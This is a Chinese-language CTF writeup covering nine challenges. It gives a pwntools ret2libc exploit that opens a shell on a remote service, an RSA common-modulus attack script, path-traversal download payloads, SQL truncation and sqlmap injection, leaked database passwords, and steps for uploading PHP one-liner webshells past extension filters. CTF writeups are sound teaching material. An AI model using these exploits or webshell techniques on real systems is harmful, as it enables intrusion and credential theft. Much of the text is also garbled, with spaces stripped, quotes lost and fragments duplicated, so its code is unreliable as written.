幾道CTF題的writeup
幾道CTF題的writeup
來自專欄網安實驗室
4 人贊了文章
原創: Z.thero 合天智匯
0x01 PlainR2B這是一道比較簡單的PWN題目,首先拖到IDA裏簡單看了一下程序,如圖
Pythonexp如下:frompwn import *
defrungameAgainPoc(p,yourname,flag): p.recvuntil("First,whats your name?") p.send(yourname+ "
") p.recvuntil("doyou want to get flag?
") p.send(flag)pwnelf= ELF("./pwn")libcelf= ELF("./libc-2.23.so")gameadd= 0x080485CBplt_write= pwnelf.symbols[write]
got_write= pwnelf.got[write]
#p= process(./pwn,env={LD_PRELOAD:./libc-2.23.so})p= remote(117.50.60.184, 12345)rungameAgainPoc(p,"ichuqiu","0"*32+ p32(plt_write)+ p32(gameadd)+ p32(1) + p32(got_write) + p32(4))write_addr= u32(p.recv(4))print"pwn write " ,hex(write_addr)libcelf_system_add= libcelf.symbols["system"] + write_addr- libcelf.symbols["write"]print"pwn libcelf_system_add",hex(libcelf_system_add)rungameAgainPoc(p,"/bin/sh ","0"*32+
p32(libcelf_system_add)+p32(gameadd)+ p32(0x804A06C))p.interactive()flag{62c51c85-1516-4ad8-989c-58ce8c29642e}0x02 AntidbgIDA查找關鍵函數,發現有一個循環比較初步判斷,是一個8位數,於是分開比較
#[ebp+var_4C]02080602
#[ebp+var_5C]0100070D020108080D000103040D0303#[ebp+var_48]02050009#[ebp+var_44]00000D02defcover(buf): buf= buf.decode("hex") rbuf= "" fori in range(len(buf) - 1,-1,-1): rbuf+= buf[i] returnrbufdefcover_hex_lines(buf):
returnbuf.replace("","").replace("","").replace("
","").decode("hex")var_6c=cover("01050D02070106010206000B07010C06") +cover("0100070D020108080D000103040D0303") +cover("02080602") + cover("02050009") +cover("00000D02")#printlen(var_6c)byte_402178= """02 02 02 02 03 01 01 020101 02 01 01 00 01 01 02 02 00 01 01 01 01 000101 02 02 00 01 01 02 02 01 01 01 01 01 02 01
0103 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0303 0D 04 03 01 00 0D 08 08 01 02 0D 07 00 01060C 01 07 0B 00 06 02 01 06 01 07 02 0D 05 010000 00 00 EF 28 68 5B 00 00 00 00 02 00 00 004800 00 00 E4 22 00 00 E4 16 00 00 00 00 00 00EF28 68 5B 00 00 00 00 0C 00 00 00 14 00 00 002C23 00 00 2C 17 00 00 00 00 00 00 EF 28 68 5B0000 00 00 0D 00 00 00 54 02 00 00 40 23 00 004017 00 00 00 00 00 00 EF 28 68 5B 00 00 00 000E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00A000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 30 40 00E022 40 00 01 00 00 00 E8 20 40 00 00 00 00 000000 00 00 00 00 00 00 00 01 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00""".replace("","").replace("
","").replace("
","").decode("hex")
","").replace("
","").decode("hex")dword_403018="""0200 00 00 02 00 00 000200 00 00 02 00 00 00 00 00 00 00 00 00 00 00""".replace("","").replace("
","").replace("
","").decode("hex")
#text:0040110E mov ecx, [ebp+var_4]
#.text:00401111 xor ecx, ebp#.text:00401113 mov dword_40301C, 3#.text:0040111D mov dword_403020, 6#.text:00401127 mov dword_403024, 7#內存值有所改變,所以修改一下dword_403018= dword_403018[0:4] + x03 + dword_403018[5:8] +x06 + dword_403018[9:12] + x07 +dword_403018[13:]printdword_403018.encode("hex")fori in range(0,42): hightnum= ord(dword_403018[ord(byte_402178[i])*4])<<4 numbershow= hightnum+ ord(byte_402138[ord(var_6c[i])*4]) printchr(numbershow),flag{06b16a72-51cc-4310-88ab-70ab68290e22}0x03 sqli本題是sql約束攻擊,註冊用戶名為「admin 」,密碼為符合規定的密碼就可以,然後登陸就能看到flagflag{b5a1f9c5-ac30-4e88-b460-e90bcb65bd70}0x04 word這算是一道簽到題,word文件內容要求關注比賽官方平臺公眾號,回復「部分flag」,獲得flag{71d7ce04-197a-4d,將doc文件重命名ZIP解壓,在document.xml發現第二部分flagb3-9c1d-0c419406a594}flag{71d7ce04-197a-4db3-9c1d-0c419406a594}0x05 RSAopensslrsa -inform PEM -in pubkey1.pem -pubin -textPublic-Key:(2048 bit)Modulus: 00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df: 3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d: 8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e: bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da: a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4: c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a: dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e: ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42: 4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48: 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17: 03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8: 79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9: ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95: 2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7: e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb: e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a: 8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66: 42:17Exponent:2333 (0x91d)opensslrsa -inform PEM -in pubkey2.pem -pubin -textPublic-Key:(2048 bit)Modulus: 00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df: 3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d: 8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e: bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da: a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4: c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a: dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e: ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42: 4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48: 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17: 03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8: 79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9: ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95: 2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7: e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb: e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a: 8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66: 42:17Exponent:23333 (0x5b25).可見,這兩個公鑰n是一樣的,只是e不同,使用RSA的共模攻擊Python如下:fromlibnum import n2s,s2nfromgmpy2 import invertimportbase64importgmpy2defbignumber(n): n= n.decode("hex") rn= 0 forb in n: rn= rn << 8 rn+= ord(b) returnrnn ="""00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df: 3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d: 8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e: bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da: a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4: c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a: dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e: ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42: 4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48: 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17: 03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8: 79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9: ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95: 2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7: e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb: e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a: 8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:42:17""" .replace(":","").replace("","").replace("","").replace("
","")#printnn =bignumber(n)printhex(n)e1= 2333e2=23333defegcd(a,b): ifa == 0: return(b,0,1) else: g,y,x= egcd(b%a,a) return(g,x - (b //a)*y,y)flag1 = base64.b64decode(open("flag1.enc","rb").read())flag2 = base64.b64decode(open("flag2.enc","rb").read())c1= s2n(flag1)c2= s2n(flag2)c2= invert(c2,n)#s= egcd(e1,e2)#printss =gmpy2.gcdext(e1,e2)#printss1= s[1]s2= 0 - s[2]prints1prints2m =pow(c1,s1,n) * pow(c2,s2,n)%nprintn2s(m)flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe} 0x06 拋磚引玉1.根據CMS版本,在wooyun鏡像站找到漏洞細節,網站存在注入,但是資料庫用戶表為空,另外發現發現文件下載漏洞,down.php?urls=data/../config.php下載文件發現DB_user/mvoa用戶的密碼define(DB_PWD,B!hpp3Dn1.);flag值:B!hpp3Dn1.2.http://url/www.zip,獲得網站備份文件,在config.php發現DB_user/root用戶的密碼define(DB_PWD,mypasswd);flag值:mypasswd0x07 暗度陳倉1.發現下載路徑/u-are-admin/download.php?dl=顯示文件找不到(u-Are-Admin/u-upload-file文件夾),發現關鍵目錄/u-Are-Admin/flag值:/u-Are-Admin/2.在/u-Are-Admin/目錄,可以上傳文件,上傳Php(大小寫繞過)一句話木馬,菜刀鏈接,netuser查看系統管理員Hack用戶的全名flag值:Hacked3563.shell能夠直接查看超級管理員用戶桌面根目錄admin.txt文件的內容flag值:ad16a159581c7085c771f0x08 瞞天過海1.AWVS掃到注入點/cat.php?id=2sqlmap直接能跑,通過注入即可獲得後臺管理員明文密碼,serverlogflag值:serverlog2.注入也能獲取root的密碼hash,*21C5210729A90C69019F01FED76FAD4654F27167然後cmd5解密得rootserverflag值:rootserver3.登錄進去,Downloadlog那裡下載日誌的地方,可以下載任意文件,可獲取C盤根目錄password.txt內容/classes/downloadfile.php?file=../../../../../../password.txtflag值:c9c35cf409344312146fa7546a94d1a60x09 偷梁換柱1.AWVS掃到./git源碼泄露,用工具GitHack下載所有源碼,在資料庫文件發現用戶名,密碼(adminAdmin@pgsql)flag值:Admin@pgsql2.用用戶名密碼登錄,管理圖片可以上傳一句話木馬的圖片,然後看到圖片的地址,把地址去掉small,即使文件真正地址,/admin/uploads/111.php.png直接菜刀鏈接,png也能當成php直接解析,然後虛擬終端netuser即可獲得系統管理員ichunqiu用戶的全名。3.菜刀能夠直接查看/tmp/access.log的內容的前16位
(如需轉載請註明出處)
推薦閱讀:
